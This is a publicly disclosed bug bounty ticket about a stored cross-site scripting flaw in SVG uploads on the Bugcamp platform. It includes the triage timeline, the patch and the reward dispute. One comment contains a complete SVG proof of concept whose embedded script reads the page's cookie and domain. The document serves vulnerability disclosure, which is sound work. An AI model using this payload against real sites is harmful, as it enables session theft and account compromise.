Stored xss with svg

Writer M0X0101 Program 버그캠프 (Bugcamp)

WEB Resolved Low 30,000 Created: Aug 26, 2022 (a month ago) Last Updated: Sep 5, 2022 (a month ago)

Weakness

Stored xss with svg

Description

summary

xss with svg upload

Reproduction process

[Please describe the process to reproduce the vulnerability]

  1. make a new report
  2. in attachment sectan add svg file with javascript pyload
  3. upload and go to the file link you will get the alert

Possible cause of vulnerability

xss

How to patch

you must sanitize your input. Your application code should never output data received as input directly to the browser without checking it for malicious code.

For more details, refer to the following articles: Preventing XSS Attacks and How to Prevent DOM-based Cross-site Scripting. You can also find useful information in the XSS Prevention Cheat Sheet maintained by the OWASP organization.

Expected results and impact

xss

Other notes and references

https://hackerone.com/reports/894876
https://hackerone.com/reports/148853
https://hackerone.com/reports/647130

Attachment

Timeline

M0X0101 submitted ticket. August 26, 2022 (a month ago)
Steve MANAGER changed the status from 'Submitted' to 'Need more info'. August 29, 2022 (a month ago)
Steve MANAGER posted a comment. August 29, 2022 (a month ago)

Please submit it along with the PoC code.

M0X0101 posted a comment. August 29, 2022 (a month ago)

hi team
that is the poc code of svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert('XSS by Spade\n'+document.domain+'\n'+document.cookie);
   </script>
</svg>

i made nthore report just to make a POC for that
the report id is : https://bugcamp.io/tickets/4e615aa96f853f7aafa08c0fc59a1482

M0X0101 posted a comment. August 29, 2022 (a month ago)

Hello @Steve
Any update…?

Jerry BUGCAMP STAFF changed the severity from 'Critical' to 'Low'. August 30, 2022 (a month ago)
Jerry BUGCAMP STAFF changed the status from 'Need more info' to 'In Progress'. August 30, 2022 (a month ago)
Jerry BUGCAMP STAFF posted a comment. August 30, 2022 (a month ago)

Hello M0X0101.

The ticket has accepted.
The vulnerabiltiy has caused by developer’s mistake that is omitted validation routine.
Patch in progress.

We decided severity of this report as “LOW”. Because, the XSS payload is triggered at “static.bugcamp.io” that is out of boundary of bounty program policy, and it used for only static file serving.
We considered for how the vulnerabilty is misusage, variously. But there was no affective scenario.
If you have provable impactive scenario (like account takeover, etc) Please let us know. than, we’ll re-evaluate this ticket.

Thank you.

M0X0101 posted a comment. August 30, 2022 (a month ago)

Hi @Jerry
Thank you for response
So this bug will reward or what?

Jerry BUGCAMP STAFF posted a comment. August 30, 2022 (a month ago)

ticket will be rewarded soon.
please be paitent.

Thank you.

M0X0101 posted a comment. August 30, 2022 (a month ago)

Thanks
But there was some problem on payment method as I’m Egyptian.
And the support team tall me they you can send it to my bank if the total bounty is greater than 50000

Jerry BUGCAMP STAFF posted a comment. August 30, 2022 (a month ago)

Okay, we also considering for payment method for foreigner.
Please email to “support@bugcamp.io”.

we can discuss about it.

M0X0101 posted a comment. August 30, 2022 (a month ago)

Ok thanks

M0X0101 posted a comment. September 1, 2022 (a month ago)

Hi team any update for report
And the support didn’t respond to me yet, can any one help?

M0X0101 posted a comment. September 4, 2022 (a month ago)

؟؟

Jerry BUGCAMP STAFF changed the severity from 'Low' to 'Low'. September 5, 2022 (a month ago)
Jerry BUGCAMP STAFF changed the status from 'In Progress' to 'Resolved'. September 5, 2022 (a month ago)
Jerry BUGCAMP STAFF changed the disclosure from 'Closed' to 'Disclosed (Full)'. September 5, 2022 (a month ago)
Jerry BUGCAMP STAFF rewarded 30,000 credit. September 5, 2022 (a month ago)

Hi M0X0101.

The Patch has deployed.
Please make sure that the vulnerability has been patched properly.

Reward is ₩30,000

M0X0101 posted a comment. September 5, 2022 (a month ago)

hello team I saw the patch but I can bypass it with another function
the Reward of ₩30,000 is so low for a bug like XSS

M0X0101 posted a comment. September 5, 2022 (a month ago)

should I make a new report because it is in another function or make it in the comments